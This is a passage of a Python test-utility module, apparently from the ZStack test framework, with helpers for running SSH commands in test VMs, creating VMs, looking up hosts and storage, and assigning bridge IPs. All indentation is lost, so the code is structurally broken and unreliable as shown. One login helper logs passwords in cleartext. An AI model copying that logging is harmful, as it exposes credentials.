# if not l3_uuid:
# vm_ip = vm.vmNics[0].ip
# else:
# vm_ip = lib_get_vm_nic_by_l3(vm, l3_uuid).ip
# ssh_cmd = vm_plugin.SshInVmCmd()
# ssh_cmd.ip = vm_ip
# ssh_cmd.username = lib_get_vr_image_username(vr_vm)
# ssh_cmd.password = lib_get_vr_image_password(vr_vm)
# ssh_cmd.command = cmd
# rspstr = http.json_dump_post(testagent.build_http_path(test_harness_ip, vm_plugin.SSH_GUEST_VM_PATH), ssh_cmd)
# rsp = jsonobject.loads(rspstr)
# if not rsp.success:
# ret = False
# test_util.test_logger('ssh error info: %s' % rsp.error)
# else:
# ret = str(rsp.result)
vr_vm = vr_vm[0]
if TestHarness == TestHarnessHost:
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(vm)
test_harness_ip = lib_find_host_by_vm(vm).managementIp
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
if lib_is_vm_vr(vm):
vm_ip = lib_find_vr_mgmt_ip(vm)
else:
if not l3_uuid:
vm_ip = vm.vmNics[0].ip
else:
vm_ip = lib_get_vm_nic_by_l3(vm, l3_uuid).ip
username = lib_get_vm_username(vm)
password = lib_get_vm_password(vm)
test_util.test_logger("Do testing through test agent: %s to ssh vm: %s, ip: %s, with cmd: %s" % (test_harness_ip, vm.uuid, vm_ip, cmd))
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, vm_ip, username, \
password, cmd)
if not rsp.success:
ret = False
test_util.test_logger('ssh error info: %s' % rsp.error)
else:
if rsp.result != None:
ret = str(rsp.result)
if ret == "":
ret = "<no stdout output>"
else:
ret = rsp.result
if ret:
test_util.test_logger('Successfully execute [command:] >>> %s <<< in [vm:] %s' % (cmd, vm_ip))
return ret
else:
test_util.test_logger('Fail execute [command:] %s in [vm:] %s' % (cmd, vm_ip))
return False
def lib_check_login_in_vm(vm, username, password, retry_times=5, l3_uuid=None):
'''
Check login with the assigned username and password.
'''
cmd = "exit 0"
ret = True
count = 1
if not l3_uuid:
vm_ip = vm.vmNics[0].ip
else:
vm_ip = lib_get_vm_nic_by_l3(vm, l3_uuid).ip
if not lib_wait_target_up(vm_ip, '22', 120):
test_util.test_fail('vm: %s is not startup in 120 seconds. Fail to reboot it. ' % vm.uuid)
while(count <= retry_times):
test_util.test_logger("retry count:%s, vm_ip:%s, username:%s, password:%s, cmd:%s" %(str(count), str(vm_ip), str(username), str(password), str(cmd)))
try:
ret, output, stderr = ssh.execute(cmd, vm_ip, username, password, False, 22)
except:
pass
if ret == 0:
test_util.test_logger("successfully login vm: %s" %(vm_ip))
return True
time.sleep(1)
count = count + 1
#If count exceeds retry_times, retry one more time so the exception is raised.
test_util.test_logger("Failed to login vm: %s; retry count exceeded max retries (%s)" % (vm_ip, str(retry_times)))
ret, output, stderr = ssh.execute(cmd, vm_ip, username, password, False, 22)
return False
#-----------VM operations-------------
def lib_create_vm(vm_cre_opt=test_util.VmOption(), session_uuid=None):
'''If vm_cre_opt is not provided, a random vm is created.'''
if not vm_cre_opt.get_name():
vm_cre_opt.set_name('test-vm')
if not vm_cre_opt.get_instance_offering_uuid():
#pick up random user vm instance offering.
instance_offerings = res_ops.get_resource(res_ops.INSTANCE_OFFERING, session_uuid)
user_vm_offerings = []
for instance in instance_offerings:
if instance.type == 'UserVm':
user_vm_offerings.append(instance)
vm_cre_opt.set_instance_offering_uuid(random.choice(user_vm_offerings).uuid)
if not vm_cre_opt.get_image_uuid():
#pick up random image
images = lib_get_not_vr_images()
#The Virtual Router image is a CentOS image, which automatically creates
#/etc/udev/rules.d/70-persistent-net.rules. If the CentOS image is booted up
#and saved as a new image template, a VM using the new template will have its
#valid network device named eth1 rather than eth0. Since there is no eth1
#config in the CentOS image, VM networking checks would fail. In Robot
#testing, we therefore have to avoid using the virtual router image.
#images = lib_remove_image_from_list_by_desc(images, img_desc="virtual router image")
image = random.choice(images)
vm_cre_opt.set_image_uuid(image.uuid)
#pick up random l3 network
if not vm_cre_opt.get_l3_uuids():
#If setting zone_uuid, will pick a l3 from this zone.
zone_uuid = vm_cre_opt.get_zone_uuid()
if not zone_uuid:
cluster_uuid = vm_cre_opt.get_cluster_uuid()
if not cluster_uuid:
host_uuid = vm_cre_opt.get_host_uuid()
if host_uuid:
zone_uuid = res_ops.get_resource(res_ops.HOST, uuid = host_uuid)[0].zoneUuid
else:
zone_uuid = res_ops.get_resource(res_ops.CLUSTER, uuid = cluster_uuid)[0].zoneUuid
vm_cre_opt.set_l3_uuids([lib_get_random_l3(zone_uuid = zone_uuid).uuid])
test_util.test_logger('VM creation selection: [image uuid:] %s; [l3 uuid:] %s' % (vm_cre_opt.image_uuid, vm_cre_opt.l3_uuids))
if not vm_cre_opt.get_timeout():
vm_cre_opt.set_timeout(300000 + 300000*len(vm_cre_opt.l3_uuids))
#To avoid an import loop, this import is done here.
#[Inlined import]
import zstackwoodpecker.zstack_test.zstack_test_vm as zstack_vm_header
vm = zstack_vm_header.ZstackTestVm()
vm.set_creation_option(vm_cre_opt)
vm.create()
return vm
def lib_create_vm_static_ip_tag(l3_uuid, ip_address):
return 'staticIp::%s::%s' % (l3_uuid, ip_address)
def lib_create_vm_hostname_tag(hostname):
hostname = '-'.join(hostname.split('_'))
return 'hostname::%s' % hostname
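# Example tag strings produced by the two helpers above (uuid and IP
# hypothetical):
# lib_create_vm_static_ip_tag('l3-uuid-1234', '192.168.1.10')
#     -> 'staticIp::l3-uuid-1234::192.168.1.10'
# lib_create_vm_hostname_tag('my_test_vm') -> 'hostname::my-test-vm'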
def lib_vm_random_idel_time(min_stay_time=1, max_stay_time=120):
random_time_interval = 1
random_exist_time = random.randrange(min_stay_time, max_stay_time, random_time_interval)
test_util.test_logger('[Random stay:] will stay for %s seconds .' % random_exist_time)
time.sleep(random_exist_time)
test_util.test_logger('[Random stay:] have stayed for %s seconds .' % random_exist_time)
#-----------Get Host resource-------------
def lib_is_image_kvm(image):
if lib_get_hv_type_of_image(image) == inventory.KVM_HYPERVISOR_TYPE:
return True
else:
return False
#Is the image's hypervisor type the simulator type?
def lib_is_image_sim(image):
if lib_get_hv_type_of_image(image) == inventory.SIMULATOR_HYPERVISOR_TYPE:
return True
else:
return False
def lib_is_image_vcenter(image):
if lib_get_hv_type_of_image(image) == inventory.VMWARE_HYPERVISOR_TYPE:
return True
else:
return False
#Is the VM's hypervisor KVM?
def lib_is_vm_kvm(vm):
if lib_get_hv_type_of_vm(vm) == inventory.KVM_HYPERVISOR_TYPE:
return True
else:
return False
def lib_is_vm_sim(vm):
if lib_get_hv_type_of_vm(vm) == inventory.SIMULATOR_HYPERVISOR_TYPE:
return True
else:
return False
def lib_is_vm_vcenter(vm):
if lib_get_hv_type_of_vm(vm) == inventory.VMWARE_HYPERVISOR_TYPE:
return True
else:
return False
def lib_is_sharable_volume(volume):
if str(volume.isShareable).strip().lower() == "true":
return True
else:
return False
def lib_get_hv_type_of_vm(vm):
#host = lib_get_vm_host(vm)
#return host.hypervisorType
return vm.hypervisorType
def lib_get_hv_type_of_image(image):
image_format = image.format
if image_format == 'qcow2' or image_format == 'raw':
return 'KVM'
test_util.test_warn('not supported format: %s in test' % image_format)
def lib_get_hv_type_of_cluster(cluster):
return cluster.hypervisorType
def lib_get_hv_type_of_host(host):
return host.hypervisorType
def lib_get_all_hosts_from_plan():
hosts = []
for zone in deploy_config.zones.get_child_node_as_list('zone'):
for cluster in zone.clusters.get_child_node_as_list('cluster'):
for host in cluster.hosts.get_child_node_as_list('host'):
hosts.append(host)
return hosts
def lib_get_cluster_hosts(cluster_uuid = None):
if cluster_uuid:
conditions = res_ops.gen_query_conditions('clusterUuid', '=', \
cluster_uuid)
else:
conditions = res_ops.gen_query_conditions('clusterUuid', '!=', \
'impossible_uuid')
hosts = res_ops.query_resource(res_ops.HOST, conditions)
return hosts
def lib_get_vm_host(vm):
vm_host_uuid = vm.hostUuid
if not vm_host_uuid:
vm_host_uuid = vm.lastHostUuid
#In a local storage environment, if the VM is stopped or destroyed and its
# root volume was migrated to another host, it has no current host uuid and
# its lastHostUuid does not reflect the host it will next start on.
# So we need to use the root volume to check the real location.
if vm.state != inventory.RUNNING and not lib_check_vm_live_migration_cap(vm):
root_volume = lib_get_root_volume(vm)
ls_ref = lib_get_local_storage_reference_information(root_volume.uuid)[0]
vm_host_uuid = ls_ref.hostUuid
hosts = res_ops.get_resource(res_ops.HOST, session_uuid=None, \
uuid=vm_host_uuid)
if hosts:
#test_util.test_logger('[vm:] %s [host uuid:] %s [host name:] %s is found' % (vm.uuid, host.uuid, host.name))
return hosts[0]
else:
test_util.test_logger('Did not find [vm:] %s host' % vm.uuid)
def lib_get_vm_last_host(vm_inv):
'''
Get last host inventory by providing vm inventory.
'''
last_host_uuid = vm_inv.lastHostUuid
if not last_host_uuid:
test_util.test_logger("Last Host UUID is None. Can't get Last Host Inventory for [vm:] %s" % vm_inv.uuid)
return None
hosts = res_ops.get_resource(res_ops.HOST, session_uuid=None, \
uuid=last_host_uuid)
if hosts:
return hosts[0]
else:
test_util.test_logger("Can't get Last Host Inventory for [vm:] %s, maybe the host has been deleted." % vm_inv.uuid)
return None
def lib_get_host_by_uuid(host_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', host_uuid)
hosts = res_ops.query_resource(res_ops.HOST, conditions)
if hosts:
return hosts[0]
def lib_get_host_by_ip(host_ip):
conditions = res_ops.gen_query_conditions('managementIp', '=', host_ip)
hosts = res_ops.query_resource(res_ops.HOST, conditions)
if hosts:
return hosts[0]
def lib_get_primary_storage_uuid_list_by_backup_storage(bs_uuid):
'''
Get the primary storage uuid list belonging to the zone(s) of the backup
storage. Since a bs might be attached to multiple zones, the returned ps
may belong to multiple zones as well.
'''
cond = res_ops.gen_query_conditions('uuid', '=', bs_uuid)
bss = res_ops.query_resource(res_ops.BACKUP_STORAGE, cond)
if bss:
zone_uuids = bss[0].attachedZoneUuids
cond = res_ops.gen_query_conditions('zoneUuid', 'in', ','.join(zone_uuids))
pss = res_ops.query_resource_fields(res_ops.PRIMARY_STORAGE, cond, \
None, ['uuid'])
ps_uuids = []
for ps in pss:
ps_uuids.append(ps.uuid)
return ps_uuids
def lib_get_backup_storage_by_uuid(bs_uuid):
cond = res_ops.gen_query_conditions('uuid', '=', bs_uuid)
bss = res_ops.query_resource(res_ops.BACKUP_STORAGE, cond)
if not bss:
test_util.test_logger('can not find bs which uuid is: %s' % bs_uuid)
return bss[0]
def lib_get_backup_storage_uuid_list_by_zone(zone_uuid):
'''
Get the backup storage uuid list attached to the given zone uuid
'''
cond = res_ops.gen_query_conditions('attachedZoneUuids', 'in', zone_uuid)
bss = res_ops.query_resource_fields(res_ops.BACKUP_STORAGE, cond, None, ['uuid'])
bs_list = []
for bs in bss:
bs_list.append(bs.uuid)
return bs_list
def lib_get_backup_storage_host(bs_uuid):
'''
Get the host that has the given backup storage uuid.
'''
session_uuid = acc_ops.login_as_admin()
try:
bss = res_ops.get_resource(res_ops.BACKUP_STORAGE, session_uuid)
finally:
acc_ops.logout(session_uuid)
if not bss:
test_util.test_fail('can not get zstack backup storage inventories.')
name = None
for bs in bss:
if bs.uuid == bs_uuid:
name = bs.name
break
if name == None:
test_util.test_fail('can not get zstack backup storage inventories.')
host = test_util.HostOption()
bss = deploy_config.backupStorages.get_child_node_as_list('sftpBackupStorage') + deploy_config.backupStorages.get_child_node_as_list('imageStoreBackupStorage')
for bs in bss:
if bs.name_ == name:
host.managementIp = bs.hostname_
host.username = bs.username_
host.password = bs.password_
if hasattr(bs, 'port_'):
host.sshPort = bs.port_
#host.managementIp = os.environ.get('sftpBackupStorageHostname')
#host.username = os.environ.get('sftpBackupStorageUsername')
#host.password = os.environ.get('sftpBackupStoragePassword')
return host
#return any host in zone_uuid
def lib_find_host_by_zone(zone_uuid):
conditions = res_ops.gen_query_conditions('zoneUuid', '=', zone_uuid)
hosts = res_ops.query_resource(res_ops.HOST, conditions, None)
if hosts:
return hosts[0]
def lib_find_host_tag(host_inv, conditions = None):
'''
conditions comes from res_ops.gen_query_conditions() and may include a
special condition, like {'name':'tag', 'op':'=', 'value':'capability::liveSnapshot'}
return: Tag inventory
'''
condition = res_ops.gen_query_conditions('resourceUuid', '=', \
host_inv.uuid, conditions)
if host_inv.hypervisorType == inventory.KVM_HYPERVISOR_TYPE:
condition = res_ops.gen_query_conditions('resourceType', '=', \
'HostVO', condition)
ret = res_ops.query_resource(res_ops.SYSTEM_TAG, condition)
return ret
def lib_get_cpu_memory_capacity(zone_uuids = None, cluster_uuids = None, \
host_uuids = None, session_uuid = None):
import apibinding.api_actions as api_actions
action = api_actions.GetCpuMemoryCapacityAction()
if zone_uuids:
action.zoneUuids = zone_uuids
if cluster_uuids:
action.clusterUuids = cluster_uuids
if host_uuids:
action.hostUuids = host_uuids
ret = acc_ops.execute_action_with_session(action, session_uuid)
return ret
def lib_get_storage_capacity(zone_uuids = None, cluster_uuids = None, \
ps_uuids = None, session_uuid = None):
import apibinding.api_actions as api_actions
action = api_actions.GetPrimaryStorageCapacityAction()
if zone_uuids:
action.zoneUuids = zone_uuids
if cluster_uuids:
action.clusterUuids = cluster_uuids
if ps_uuids:
action.primaryStorageUuids = ps_uuids
ret = acc_ops.execute_action_with_session(action, session_uuid)
return ret
def lib_get_host_libvirt_tag(host_inv):
'''
find and return given host's libvirt version.
'''
condition = res_ops.gen_query_conditions('tag', 'like', '%libvirt::version%')
tag_info = lib_find_host_tag(host_inv, condition)
if tag_info:
libvirt_ver = tag_info[0].tag.split('::')[2]
test_util.test_logger('host: %s libvirt version is: %s' % \
(host_inv.uuid, libvirt_ver))
return libvirt_ver
else:
test_util.test_logger('Did not find libvirt version for host: %s ' % \
host_inv.uuid)
return None
def lib_check_live_snapshot_cap(host_inv):
'''
check if the host supports live snapshot operations.
'''
conditions = res_ops.gen_query_conditions('tag', '=', \
'capability::liveSnapshot')
tag_info = lib_find_host_tag(host_inv, conditions)
if tag_info:
test_util.test_logger('host: %s support live snapshot' % host_inv.uuid)
return True
else:
test_util.test_logger('host: %s does not support live snapshot' \
% host_inv.uuid)
return False
def lib_check_vm_live_migration_cap(vm_inv):
root_volume = lib_get_root_volume(vm_inv)
ps = lib_get_primary_storage_by_uuid(root_volume.primaryStorageUuid)
if ps.type == inventory.LOCAL_STORAGE_TYPE:
return False
return True
#return host inventory
def lib_find_host_by_vm(vm_inv):
'''
Get host inventory by providing vm inventory.
'''
if not vm_inv.hostUuid:
host_uuid = vm_inv.lastHostUuid
else:
host_uuid = vm_inv.hostUuid
if not host_uuid:
test_util.test_logger("Host UUID is None. Can't get Host IP address for [vm:] %s" % vm_inv.uuid)
return None
hosts = res_ops.get_resource(res_ops.HOST, session_uuid=None, \
uuid=host_uuid)
if hosts:
return hosts[0]
def lib_find_hosts_by_ps_uuid(ps_uuid):
'''
find all hosts which are using the given ps
'''
cond = res_ops.gen_query_conditions('cluster.primaryStorage.uuid', '=', \
ps_uuid)
return res_ops.query_resource(res_ops.HOST, cond)
def lib_find_host_by_iscsi_ps(ps_inv):
'''
Get host information from deploy.xml for ISCSI filesystem backend.
'''
ps_name = ps_inv.name
iscsi_host = test_util.HostOption()
iscsi_host.managementIp = os.environ.get('iscsiHostname')
iscsi_host.username = os.environ.get('iscsiUserName')
iscsi_host.password = os.environ.get('iscsiPassword')
return iscsi_host
def lib_get_primary_storage_by_uuid(ps_uuid):
cond = res_ops.gen_query_conditions('uuid', '=', ps_uuid)
return res_ops.query_resource(res_ops.PRIMARY_STORAGE, cond)[0]
def lib_is_ps_iscsi_backend(ps_uuid):
# ps = lib_get_primary_storage_by_uuid(ps_uuid)
# if ps.type == inventory.ISCSI_FILE_SYSTEM_BACKEND_PRIMARY_STORAGE_TYPE:
# return True
return False
def lib_find_random_host_by_volume_uuid(volume_uuid):
'''
Return a random host inventory.
The returned host should not be the host holding current volume_inv. But it
should belong to the same cluster of volume_inv's primary storage.
'''
avail_hosts = vol_ops.get_volume_migratable_host(volume_uuid)
if avail_hosts:
return random.choice(avail_hosts)
return None
def lib_find_random_host(vm = None):
'''
Return a random host inventory.
If Vm is provided, the returned host should not be the host of VM. But it
should belong to the same cluster of VM.
'''
import zstackwoodpecker.header.host as host_header
target_hosts = []
cluster_id = None
current_host_uuid = None
if vm:
current_host = lib_get_vm_host(vm)
cluster_id = vm.clusterUuid
current_host_uuid = current_host.uuid
all_hosts = lib_get_cluster_hosts(cluster_id)
# TODO: it should select non-root host for migrate after cold migrate issue is fixed
for host in all_hosts:
if host.uuid != current_host_uuid and \
host.status == host_header.CONNECTED and \
host.state == host_header.ENABLED and \
host.username == 'root' and \
host.sshPort == 22:
target_hosts.append(host)
if not target_hosts:
return None
return random.choice(target_hosts)
def _lib_assign_host_l3_ip(host_pub_ip, cmd):
with lock.FileLock(host_pub_ip):
http.json_dump_post(testagent.build_http_path(host_pub_ip, \
host_plugin.SET_DEVICE_IP_PATH), cmd)
def _lib_flush_host_l2_ip(host_ip, net_device):
cmd = host_plugin.FlushDeviceIpCmd()
cmd.ethname = net_device
test_util.test_logger('Flush ip address for net device: %s from host: %s' \
% (net_device, host_ip))
with lock.FileLock(host_ip):
http.json_dump_post(testagent.build_http_path(host_ip, \
host_plugin.FLUSH_DEVICE_IP_PATH), cmd)
def lib_create_host_vlan_bridge(host, cmd):
with lock.FileLock(host.uuid):
http.json_dump_post(testagent.build_http_path(host.managementIp, host_plugin.CREATE_VLAN_DEVICE_PATH), cmd)
#will be based on x.y.*.*/16 addresses.
#Host ip addresses will be assigned from x.y.128.0 to x.y.255.254
def _lib_gen_host_next_ip_addr(network_address, addr_list):
network_addr = network_address.split('.')
available_ip_list = list(network_addr)
net_3_num = int(network_addr[2])
if net_3_num < 128:
net_3_num += 128
available_ip_list[2] = str(net_3_num)
available_ip = '.'.join(available_ip_list)
return available_ip
#if not addr_list:
# network_addr = network_address.split('.')
# network_addr[2] = '128'
# return ('.').join(network_addr)
#addr_list.sort()
#assigned_last_ip = addr_list[-1].split('.')
#assigned_last_ip_f3 = string.atoi(assigned_last_ip[3])
#assigned_last_ip_f2 = string.atoi(assigned_last_ip[2])
#if assigned_last_ip_f2 == 255 and assigned_last_ip_f3 == 254:
# test_util.test_fail('No available ip address. Current used ip address: %s' % addr_list)
#if assigned_last_ip_f3 != 255:
# assigned_last_ip[3] = str(assigned_last_ip_f3 + 1)
#else:
# assigned_last_ip[2] = str(assigned_last_ip_f2 + 1)
# assigned_last_ip[3] = str(0)
#
#return ('.').join(assigned_last_ip)
def lib_get_stored_host_ip_dict(l2_vlan_value):
host_ip_db = filedb.FileDB(HostL2IpDb)
return host_ip_db.get(str(l2_vlan_value))
def lib_set_host_ip_dict(l2_vlan_value, host_ip_dict):
host_ip_db = filedb.FileDB(HostL2IpDb)
host_ip_db.set(str(l2_vlan_value), host_ip_dict)
def lib_set_vm_host_l2_ip(vm):
host = lib_find_host_by_vm(vm)
if not host:
test_util.test_logger('Did not find host: %s for VM: %s. Skip host IP assignment.' % (vm.hostUuid, vm.uuid))
return False
l2s = lib_get_private_l2s_by_vm(vm)
for l2 in l2s:
l3 = lib_get_l3_by_l2(l2.uuid)[0]
lib_assign_host_l2_ip(host, l2, l3)
def lib_assign_host_l2_ip(host, l2, l3):
'''
Assign an IP address to a Host L2 bridge device, for testing connections.
It will assign the IP to either a vlan or a no-vlan bridge device, e.g.
br_eth1, br_eth0.10, br_eth0_20 etc.
br_eth1 means the vm uses the no-vlan network eth1.
br_eth0.10 means the vm uses the pre-defined vlan eth0.10; pre-defined
means the vlan is created by the user and not controlled by zstack.
br_eth0_20 means the vm uses the zstack assigned vlan eth0.20.
Current testing assumes each L2 only has 1 L3, because multiple L3s have
different network masks and the single Host L2 IP then can't know which L3
network it needs to connect to. The test netmask is assumed to be
255.255.0.0, because test cases use x.y.0.1~x.y.127.255 for VM IP
assignment and x.y.128.1~x.y.255.254 for host IP assignment.
It assumes an L3 only has 1 ipRange. Multiple ipRanges will impact the
test, since a host IP can only belong to 1 subnet.
It assumes different L3s do not share the same ipRange, even if they are
in different vlans. e.g. you can't config 2 L3s with
10.10.0.1~10.10.127.255, even if 1 vlan is 20 and another is 21. The host
L2 bridge IPs would be assigned from the same subnet, so test connections
would not be routed to the right place.
Tests should avoid changing the host's default eth0 IP address. If the
host's default network device (for zstack management) is not eth0, please
change HostDefaultEth.
'''
def _do_set_host_l2_ip(host_pub_ip, next_avail_ip, dev_name):
#Has to use the br_eth0_vlan device to assign the ip address,
#as guest vlan devices can't ping each other in a nested env.
#This may be wrong, but using bridge ip works.
cmd_ip = host_plugin.SetDeviceIpCmd()
cmd_ip.ethname = dev_name
cmd_ip.ip = next_avail_ip
cmd_ip.netmask = l3_ip_ranges.netmask
_lib_assign_host_l3_ip(host_pub_ip, cmd_ip)
test_util.test_logger("Successfully config %s to [host:] %s [dev:] %s with IP: %s" % (next_avail_ip, host_pub_ip, dev_name, next_avail_ip))
if not linux.wait_callback_success(lib_check_directly_ping, next_avail_ip, 10, 1):
test_util.test_warn("[host:] %s [IP:] %s is Not connectable after 10 seconds. This will make future testing failure." % (host_pub_ip, next_avail_ip))
return next_avail_ip
def _generate_and_save_host_l2_ip(host_pub_ip, dev_name):
host_pub_ip_list = host_pub_ip.split('.')
host_ip_dict = lib_get_stored_host_ip_dict(dev_name)
if host_ip_dict and host_ip_dict.has_key(host_pub_ip):
next_avail_ip = host_ip_dict[host_pub_ip]
return next_avail_ip
net_address = l3_ip_ranges.startIp.split('.')
net_address[2] = host_pub_ip_list[2]
net_address[3] = host_pub_ip_list[3]
net_address = '.'.join(net_address)
next_avail_ip = _lib_gen_host_next_ip_addr(net_address, None)
host_ip_dict = {host_pub_ip: next_avail_ip}
#following lines generate not fixed host ip address.
#if not host_ip_dict or not isinstance(host_ip_dict, dict):
# next_avail_ip = _lib_gen_host_next_ip_addr(net_address, None)
# host_ip_dict = {host_pub_ip: next_avail_ip}
#else:
# next_avail_ip = _lib_gen_host_next_ip_addr(net_address, \
# host_ip_dict.values())
# host_ip_dict[host_pub_ip] = next_avail_ip
lib_set_host_ip_dict(dev_name, host_ip_dict)
return next_avail_ip
def _set_host_l2_ip(host_pub_ip):
br_ethname = 'br_%s' % l2.physicalInterface
if l2_vlan:
br_ethname = '%s_%s' % (br_ethname, l2_vlan)
if br_ethname == 'br_%s' % HostDefaultEth:
test_util.test_warn('Dangerous: should not change host default network interface config for %s' % br_ethname)
return
next_avail_ip = _generate_and_save_host_l2_ip(host_pub_ip, br_ethname+l3.uuid)
#if ip has been set to other host, following code will do something wrong.
#if lib_check_directly_ping(next_avail_ip):
# test_util.test_logger("[host:] %s [bridge IP:] %s is connectable. Skip setting IP." % (host_pub_ip, next_avail_ip))
# return next_avail_ip
#else:
# return _do_set_host_l2_ip(host_pub_ip, next_avail_ip)
return _do_set_host_l2_ip(host_pub_ip, next_avail_ip, br_ethname)
with lock.FileLock('lib_assign_host_l2_ip'):
host_pub_ip = host.managementIp
l2_vlan = lib_get_l2_vlan(l2.uuid)
if not l2_vlan:
l2_vlan = ''
if l2.physicalInterface == HostDefaultEth:
test_util.test_logger('Not Vlan. Will not change br_%s ip.' \
% HostDefaultEth)
return host_pub_ip
else:
test_util.test_logger('%s might be manually created vlan dev.' \
% l2.physicalInterface)
else:
l2_vlan = str(l2_vlan)
#l3 = lib_get_l3_by_l2(l2.uuid)[0]
if l3.system:
test_util.test_logger('will not change system management network l3: %s' % l3.name)
return
l3_ip_ranges = l3.ipRanges[0]
if (l3_ip_ranges.netmask != '255.255.0.0'):
test_util.test_warn('L3 name: %s uuid: %s network [mask:] %s is not 255.255.0.0 . Will not assign IP to host. Please change test configuration to make sure L3 network mask is 255.255.0.0.' % (l3.name, l3.uuid, l3_ip_ranges.netmask))
return
#Need to set vlan bridge ip address for local host firstly.
cond = res_ops.gen_query_conditions('hypervisorType', '=', inventory.KVM_HYPERVISOR_TYPE)
all_hosts_ips = res_ops.query_resource_fields(res_ops.HOST, cond, None, \
['managementIp'])
for host_ip in all_hosts_ips:
#if current host is ZStack host, will set its bridge l2 ip firstly.
if linux.is_ip_existing(host_ip.managementIp):
current_host_ip = host_ip.managementIp
_set_host_l2_ip(current_host_ip)
break
else:
test_util.test_logger("Current machine is not in ZStack Hosts. Will directly add vlan device:%s and set ip address." % l2_vlan)
any_host_ip = all_hosts_ips[0].managementIp
if not linux.is_network_device_existing(l2.physicalInterface):
test_util.test_fail("network device: %s is not on current test machine. Test machine needs to have same network connection with KVM Hosts." % l2.physicalInterface)
current_host_ip = linux.find_route_interface_ip_by_destination_ip(any_host_ip)
if not current_host_ip:
current_host_ip = '127.0.0.1'
if l2_vlan:
dev_name = '%s.%s' % (l2.physicalInterface, l2_vlan)
br_dev = 'br_%s_%s' % (l2.physicalInterface, l2_vlan)
else:
dev_name = l2.physicalInterface
br_dev = 'br_%s' % dev_name
if br_dev == 'br_%s' % HostDefaultEth:
test_util.test_warn('Dangerous: should not change host default network interface config for %s' % br_dev)
return
next_avail_ip = _generate_and_save_host_l2_ip(current_host_ip, \
br_dev+l3.uuid)
if not linux.is_ip_existing(next_avail_ip):
if l2_vlan:
if not linux.is_network_device_existing(br_dev):
linux.create_vlan_eth(l2.physicalInterface, l2_vlan, \
next_avail_ip, l3_ip_ranges.netmask)
linux.create_bridge(br_dev, dev_name)
test_util.test_logger('create bridge:%s and set ip:%s' % (br_dev, next_avail_ip))
else:
linux.set_device_ip(br_dev, next_avail_ip, \
l3_ip_ranges.netmask)
test_util.test_logger('set ip:%s for bridge: %s' % (next_avail_ip, br_dev))
else:
if not linux.is_network_device_existing(dev_name):
test_util.test_warn('l2 dev: %s does not exist' \
% dev_name)
else:
if not linux.is_network_device_existing(br_dev):
linux.set_device_ip(dev_name, next_avail_ip, \
l3_ip_ranges.netmask)
linux.create_bridge(br_dev, dev_name)
test_util.test_logger('create bridge:%s and set ip:%s' % (br_dev, next_avail_ip))
else:
linux.set_device_ip(br_dev, next_avail_ip, \
l3_ip_ranges.netmask)
test_util.test_logger('set ip:%s for bridge: %s' % (next_avail_ip, br_dev))
#set remote host ip address
if not linux.is_ip_existing(host_pub_ip):
_set_host_l2_ip(host_pub_ip)
#host_l2_ip db should do regular cleanup, as its file size will be increased.
#the function should be put into suite_teardown.
def lib_cleanup_host_ip_dict():
host_ip_file = filedb.ZSTACK_FILEDB_DIR + HostL2IpDb
if os.path.exists(host_ip_file):
host_ip_db = filedb.FileDB(HostL2IpDb)
db_dict = host_ip_db.get_all()
for device, ip_info in db_dict.iteritems():
for host in ip_info.keys():
_lib_flush_host_l2_ip(host, device)
os.remove(host_ip_file)
def lib_network_check(target_ip, target_port, expect_result=True):
'''
check target machine's target port connectivity
'''
if not lib_check_system_cmd('telnet'):
#if not lib_check_system_cmd('nc'):
return False == expect_result
try:
shell.call('echo "quit" | telnet %s %s|grep "Escape character"' % (target_ip, target_port))
#shell.call('nc -w1 %s %s' % (target_ip, target_port))
test_util.test_logger('check target: %s port: %s connection success' % (target_ip, target_port))
return True == expect_result
except:
test_util.test_logger('check target: %s port: %s connection failed' % (target_ip, target_port))
return False == expect_result
def lib_wait_target_down(target_ip, target_port, timeout=60):
'''
wait for target "machine" shutdown by checking its network connection,
until timeout.
'''
def wait_network_check(param_list):
return lib_network_check(param_list[0], param_list[1], param_list[2])
return linux.wait_callback_success(wait_network_check, (target_ip, target_port, False), timeout)
def lib_wait_target_up(target_ip, target_port, timeout=60):
'''
wait for target "machine" startup by checking its network connection,
until timeout.
'''
def wait_network_check(param_list):
return lib_network_check(param_list[0], param_list[1], param_list[2])
return linux.wait_callback_success(wait_network_check, (target_ip, target_port, True), timeout)
#-----------Get L2 Network resource-------------
def lib_get_l2s():
return res_ops.get_resource(res_ops.L2_NETWORK, session_uuid=None)
def lib_get_l2s_uuid_by_vm(vm):
l3_uuids = lib_get_l3s_uuid_by_vm(vm)
all_l3s = lib_get_l3s()
l2_uuids = []
for l3 in all_l3s :
if l3.uuid in l3_uuids:
l2_uuids.append(l3.l2NetworkUuid)
return l2_uuids
def lib_get_private_l2s_by_vm(vm):
'''
Will return the VM's l2 inventory list, excluding l2s that belong to the
public or management networks.
'''
l3_uuids = lib_get_private_l3s_uuid_by_vm(vm)
all_l3s = lib_get_l3s()
l2_uuids = []
for l3 in all_l3s :
if l3.uuid in l3_uuids:
l2_uuids.append(l3.l2NetworkUuid)
cond = res_ops.gen_query_conditions('uuid', 'in', ','.join(l2_uuids))
return res_ops.query_resource(res_ops.L2_NETWORK, cond)
def lib_get_l2s_by_vm(vm):
l2_uuids = lib_get_l2s_uuid_by_vm(vm)
l2s = []
all_l2s = lib_get_l2s()
for l2 in all_l2s:
if l2.uuid in l2_uuids:
l2s.append(l2)
return l2s
def lib_get_l2_vlan(l2_uuid, session_uuid=None):
'''
return vlan value for L2. If L2 doesn't have vlan, will return None
'''
#conditions = res_ops.gen_query_conditions('uuid', '=', l2_uuid)
#l2_vlan = res_ops.query_resource(res_ops.L2_VLAN_NETWORK, conditions, session_uuid)
#if not l2_vlan:
# test_util.test_logger('Did not find L2: %s ' % l2_uuid)
# return None
#else:
# return l2_vlan[0].vlan
l2_vlan = res_ops.get_resource(res_ops.L2_VLAN_NETWORK, session_uuid, uuid=l2_uuid)
if l2_vlan:
return l2_vlan[0].vlan
test_util.test_logger('L2: %s did not have vlan. ' % l2_uuid)
return None
#-----------Get L3 Network resource-------------
def lib_get_l3_uuid_by_nic(nic_uuid, session_uuid=None):
conditions = res_ops.gen_query_conditions('uuid', '=', nic_uuid)
vm_nics = res_ops.query_resource(res_ops.VM_NIC, conditions)
return vm_nics[0].l3NetworkUuid
def lib_get_l3_service_type(l3_uuid):
'''
